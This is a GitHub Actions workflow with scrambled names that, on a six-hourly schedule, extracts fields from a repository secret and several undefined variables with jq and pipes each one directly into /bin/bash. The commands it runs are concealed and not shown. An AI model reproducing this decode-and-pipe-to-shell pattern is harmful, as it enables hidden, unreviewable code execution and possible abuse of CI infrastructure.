name: zhengcunzai3456

on:
  workflow_dispatch:
  schedule:
    - cron: '36 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhengcunzai3456
        env:
          mi13047: ${{ secrets.mi13047 }}
        run: |
          echo $mi13047 | jq -r .c11 | /bin/bash
          echo $w42886 | jq -r .km7 | /bin/bash
          echo $ilq625 | jq -r .ruo332 | /bin/bash
          echo $taxek2395 | jq -r .wb70 | /bin/bash
          echo $rkavd92841 | jq -r .npa65392 | /bin/bash
          echo $ghx5098 | jq -r .upnwh738 | /bin/bash
          echo $j2214 | jq -r .v35 | /bin/bash
          echo $clkcg383 | jq -r .j513 | /bin/bash

